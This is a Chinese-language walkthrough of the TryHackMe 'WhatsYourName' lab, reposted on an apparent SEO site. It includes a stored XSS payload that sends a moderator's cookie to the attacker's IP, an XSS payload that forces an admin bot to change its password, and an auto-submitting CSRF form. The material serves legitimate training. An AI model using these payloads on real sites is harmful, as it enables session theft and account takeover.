当前位置: 首页 > wzjs >正文

网站优化检测在线教育

网站优化检测,在线教育,邯郸网站建设服务,公立幼儿园网站建设方案TryhackMe WhatsYourName:题解 文章目录 TryhackMe WhatsYourName:题解房间介绍前期准备信息收集阶段端口扫描子域名爆破worldwap.thm:8081目录探测 渗透开始worldwap.thm注册页面XSS 登录Admin用户CSRF(客户端请求伪造)获得Admin权限 房间介绍 该挑战将…

TryhackMe WhatsYourName:题解

文章目录

  • TryhackMe WhatsYourName:题解
    • 房间介绍
    • 前期准备
    • 信息收集阶段
      • 端口扫描
      • 子域名爆破
      • worldwap.thm:8081目录探测
    • 渗透开始
      • worldwap.thm注册页面XSS
    • 登录Admin用户
    • CSRF(客户端请求伪造)获得Admin权限

image-20250409140046991

房间介绍

该挑战将测试客户端漏洞利用技能,从检查 Javascript 到作 cookie 再到发起 CSRF/XSS 攻击。要启动 VM,请单击任务右上角的 Start Machine 按钮。

您将在 AttackBox 上找到完成挑战所需的所有工具,例如 Nmap、PHP shell 等等。另外,请在文件中添加主机名。worldwap.thm``hosts

切勿点击从未知来源收到的链接。您能否捕获标志并获得对 Web 应用程序的管理员访问权限?

前期准备

将获得的IP放入hosts文件中

image-20250409140354378

信息收集阶段

端口扫描

扫描到22端口,80端口,8081端口开放

image-20250409141302343

子域名爆破

趁着子域名爆破的时间去查看一下那个页面更好作为我们渗透的起点

image-20250409141633295

通过对子域名的爆破发现没有子域名,但是我们发现8081端口的网站是可以访问的但是是一片空白,这里小T想到的就是目录探测

worldwap.thm:8081目录探测

image-20250409142947495

渗透开始

worldwap.thm注册页面XSS

由于小T注册完成去登录的时候给我弹窗用户未确认,然后小T再去注册的时候发现上面写了,您现在可以预先注册!网站版主将审核您的详细信息。我就知道要打xss,时间上是上面的房间介绍说了

<script>fetch('http://你的IP/?'+btoa(document.cookie));</script>

image-20250409145713595

后台要监听端口看看是不是可以被执行,这边我就监听了自己的IP,应该是小T设置的原因,所有监听0.0.0.0监听不到,给小T差点气死,如果使用0.0.0.0监听不到可以尝试使用自己的vpn的ip

image-20250409150118793

点击注册,等一下这边就会给你返回版主的cookie值,然后我们就换上版主的cookie进行登录,

image-20250409151116821

这里要对拿到的东西进行base64反编译得到我们的PHPSESSID=ppob0qfvu0t5c32702ckdj424v
当然每个人是不同的

image-20250409151237091

到这里小T才反应过来,8081端口对应就是子域名login.worldwap.thm,拿到的cookie可以在网站login.worldwap.thm上使用

image-20250409151546915

这里点击go to chat,我们发现管理员机器人在线,这样的话我们能不能盗取admin bot的cookie呢,用了几个playload发现不行,因为小T xss不怎么好

image-20250409151717487

这里还有一个修改密码,发现谁执行就可以修改谁的密码,抓包将分析发现是通过new_password来传输新密码,这里我们直接拟好playload发给admin Bot就可以执行代码将密码改成Tiamo124

<script>fetch('/change_password.php',{method:'POST',headers:{'Content-Type':'application/x-www-form-urlencoded'},body:"new_password=Tiamo124"});</script>

image-20250409153154536

登录Admin用户

登录到admin用户就可以看到flag了,但是小T看来了一下https://jaxafed.github.io/博客的文章发现还可以有另一种csrf(客户端请求伪造方法)

image-20250409153546124

CSRF(客户端请求伪造)获得Admin权限

客户端请求伪造

  1. 在CSRF攻击中,攻击者诱使用户的浏览器发起一个恶意请求,本质上是借助用户的凭证,以用户的身份去执行特定的操作。
  2. 在用户访问攻击者构造的恶意页面时,如果此时浏览器访问第三方站点带上了第三方的Cookie,那么第三方站点会认为这是一个已登录的用户的访问请求,浏览器就可顺利完成请求操作,因此该攻击方式叫做“跨站请求伪造”。
  3. 在整个攻击过程中,攻击者并没有拿到受害者的身份凭证,也拿不到操作后的返回结果(同源策略),攻击者只是诱使受害者发出了一个特定的请求。

因为对面的Adminbot会点击我们的链接,所以我们这边直接伪造一个页面让他访问更改他的密码,让我们登录

<!DOCTYPE html>
<html>
<head><title>CSRF</title>
</head>
<body>
<!-- 创建一个自动提交的表单 -->
<form id="autosubmit" action="http://login.worldwap.thm/change_password.php" enctype="application/x-www-form-urlencoded" method="POST"><!-- 隐藏的输入字段,用于设置新密码 --><input name="new_password" type="hidden" value="Tiamo" />
</form>
<script>// 页面加载完成后自动提交表单document.getElementById("autosubmit").submit();
</script>
</body>
</html>

记得在本地开启http服务

在这里插入图片描述

这里发过去等几秒就可以去登录了账号admin :Tiamo

image-20250409154747448

http://www.dtcms.com/wzjs/291169.html

相关文章:

  • wordpress iis 404小熊猫seo博客
  • 有哪些好的做网站公司品牌定位
  • 规划设计公司合作加盟成立分公司广州seo报价
  • 找人做海报在什么网站找企业营销策划实训报告
  • 做品牌特价的网站推广自己的网站
  • 最新网站高端定制网站建设
  • 公司做网站的发票能抵扣吗厦门百度代理
  • 网站pv多少可以长沙弧度seo
  • 做同城购物网站成品视频直播软件推荐哪个好用
  • 个人网站能允许做哪些外贸网站平台有哪些
  • 网站如何做熊掌号怎么在百度上设置自己的门店
  • 怎么在网上卖东西网站seo运营培训机构
  • 有关房地产开发建设的网站整合营销策划名词解释
  • 公司网站日常维护做哪些千度搜索引擎
  • 品牌营销型网站作用seo技术经理
  • 做网站建设公司赚钱吗网站查询是否安全
  • 郓城做网站哪家好百度人气榜排名
  • 做网站需要竞品分析么刷赞网站推广ks
  • 平台网站建设设计推广普通话手抄报内容
  • 品质好物推荐怎么上seo整体优化
  • 手机网站广告公司搜索seo
  • 代理做网站的合同新网域名注册查询
  • 做饰品网站西安seo外包
  • 网站建设整改报告品牌推广的目的和意义
  • 网站建设比较好淘宝店铺推广
  • 无锡网站维护网络推广优化招聘
  • 怎么做一考试网站线上推广
  • 大兴网站开发网站建设咨询seo优化网站百度技术
  • 政府网站建设存在问题网络营销怎么做?
  • 做网站数据库表各字段详情web网址